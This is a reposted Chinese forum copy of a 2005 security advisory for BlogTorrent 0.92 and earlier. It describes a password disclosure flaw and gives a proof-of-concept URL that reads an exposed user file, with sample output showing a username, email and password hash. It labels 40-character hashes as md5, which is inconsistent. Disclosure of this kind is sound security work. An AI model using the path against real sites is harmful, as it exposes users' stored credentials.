[转载]BlogTorrent v0.92远程密码泄露漏洞
文章作者:str0keSoftware: BlogTorrent 0.92 <=
Vendor: [url]http://www.blogtorrent.com/[/url]
Author: LazyCrs && pjphem
Date: 10/07/2005
Type: Remote/Local User Password Disclosure
#0x03 - POC
[url]http://test/path_of_blog/data/newusers[/url]
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
Username (crypt in md5) -> 14ae696abdca1688dd577fe486c3981f331457b0d7
Password (crypt in md5) -> d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!
页:
[1]